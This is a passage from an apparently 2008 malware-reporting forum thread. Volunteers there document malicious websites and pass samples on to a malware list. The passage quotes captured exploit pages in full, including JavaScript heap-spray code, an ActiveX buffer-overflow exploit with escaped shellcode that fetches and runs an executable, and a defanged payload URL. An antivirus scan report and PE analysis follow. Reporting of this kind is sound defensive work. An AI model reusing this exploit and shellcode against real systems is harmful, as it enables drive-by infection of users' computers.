StyleSX = getStyleSX(StyleSX,XusASSs);
hB = (hssPPA - 0x400000)/hBFFSSx;
mmr = new Array();
for (i=0;i<hB;i++) {
    mmr[i] = StyleSX + slle;
    }
Crash();
}

function getStyleSX(StyleSX, XusASSs) {
   while (StyleSX.length*2<XusASSs) {
         StyleSX += StyleSX;
   }
   StyleSX = StyleSX.substring(0,XusASSs/2);
   return StyleSX;
}

</SCRIPT></HEAD>
<BODY onload="Run_BOF()"><INPUT id="focus" type="checkbox"></BODY></HTML>

<html>
<object
classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277'
id='target'>
</object>
<script>

ure="%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353
%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578";

ure = shellcode;

shecode = unescape(ure);
sadw="%u9090%u9090";
bbl = unescape(sadw);
hea = 20;
slapace = hea+shecode.length
while (bbl.length<slapace) bbl+=bbl;
fllk = bbl.substring(0, slapace);
block = bbl.substring(0, bbl.length-slapace);
ders= blocksad.length + slapace
while(ders<0x40000) blocksad = blocksad+blocksad+fllk;
memory = new Array();
for (x=0; x<800; x++) memory[x] = blocksad + shecode;
var buff = '\x0a';
while (buff.length < 5000) buff+='\x0a\x0a\x0a\x0a';
target.server = buff;
target.receive();
</script>
</html>


and finally
hxxp://www.dir4you.org/6/file.php?test11
which is being saved as file.exe
Quote:

av detection: 4/32 (12.50%)

AhnLab-V3 2008.4.10.2 2008.04.11 -
AntiVir 7.6.0.84 2008.04.11 -
Authentium 4.93.8 2008.04.10 -
Avast 4.8.1169.0 2008.04.11 -
AVG 7.5.0.516 2008.04.10 -
BitDefender 7.2 2008.04.11 BehavesLike:Trojan.WUDisable
CAT-QuickHeal 9.50 2008.04.10 -
ClamAV 0.92.1 2008.04.11 -
DrWeb 4.44.0.09170 2008.04.11 -
eSafe 7.0.15.0 2008.04.09 -
eTrust-Vet 31.3.5687 2008.04.10 -
Ewido 4.0 2008.04.10 -
F-Prot 4.4.2.54 2008.04.10 -
F-Secure 6.70.13260.0 2008.04.11 Trojan-Downloader.NSIS.Agent.at
FileAdvisor 1 2008.04.11 -
Fortinet 3.14.0.0 2008.04.10 Adware/Vapsup.0408
Ikarus T3.1.1.26 2008.04.11 -
Kaspersky 7.0.0.125 2008.04.11 Trojan-Downloader.NSIS.Agent.at
McAfee 5271 2008.04.10 -
Microsoft 1.3408 2008.04.11 -
NOD32v2 3018 2008.04.11 -
Norman 5.80.02 2008.04.10 -
Panda 9.0.0.4 2008.04.10 -
Prevx1 V2 2008.04.11 -
Rising 20.39.32.00 2008.04.10 -
Sophos 4.28.0 2008.04.11 -
Sunbelt 3.0.1032.0 2008.04.08 -
Symantec 10 2008.04.11 -
TheHacker 6.2.92.273 2008.04.11 -
VBA32 3.12.6.4 2008.04.06 -
VirusBuster 4.3.26:9 2008.04.10 -
Webwasher-Gateway 6.6.2 2008.04.11 -

weitere Informationen
File size: 40849 bytes
MD5...: 091b27bc8163b6802799db33a2b29120
SHA1..: 085188e3fa4bf6187f67bbe23ee9976aac7c5424
SHA256: f4ebc206ccf12f70ae6a1ac2882879fde77a467b8ce1fa32afc9dbd0cc43da79
SHA512: 5b62c0919d7d07fff715de59baa32159a504dd620eb2caf60242dc65b026ab5a
897b4bd55595996dc0d807b628dde901a7120def9f0def78843a87a8ec0034aa
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x403225
timedatestamp.....: 0x47acc8b2 (Fri Feb 08 21:25:06 2008)
machinetype.......: 0x14c (I386)

( 5 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x5934 0x5a00 6.46 663546ac41801daf2dc51f560ec05a56
.rdata 0x7000 0x1190 0x1200 5.18 db16645055619c0cc73276ff5c3adb75
.data 0x9000 0x1af98 0x400 4.70 f0511f18783910813a0de0de02bc1206
.ndata 0x24000 0x8000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rsrc 0x2c000 0x6c8 0x800 2.92 b3eea649cd2c734f0ff0d05dd8d99ef5

( 8 imports )
> KERNEL32.dll: CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
> USER32.dll: EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
> GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
> SHELL32.dll: SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
> ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
> COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, -, ImageList_Create
> ole32.dll: CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
> VERSION.dll: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

( 0 exports )


as a side note i want to mention that i found a login form here:
hxxp://www.dir4you.org/TDS/
Back to top
View users profile Send private message
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5879

MIRT Premium

PostPosted: Sat Apr 12, 2008 8:52 pm    Post subject:
Reply with quote

I've added all the exploits and the .exe file to the malware listserv.


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
Display posts from previous:   
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links All times are GMT
Page 1 of 1

 
Quick Reply:
Username: 

Quote the last message
Attach signature (signatures can be changed in profile)
 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001 phpBB Group
2002-2008 © Computer Cops LLC dba CastleCops®. All rights reserved.
Acceptable Use Policy. Use signifies your agreement.
191ppm 0.251s (0.034s)
Making cybercriminals unhappy since 2002*
In Memory of Trpm
spacer spacer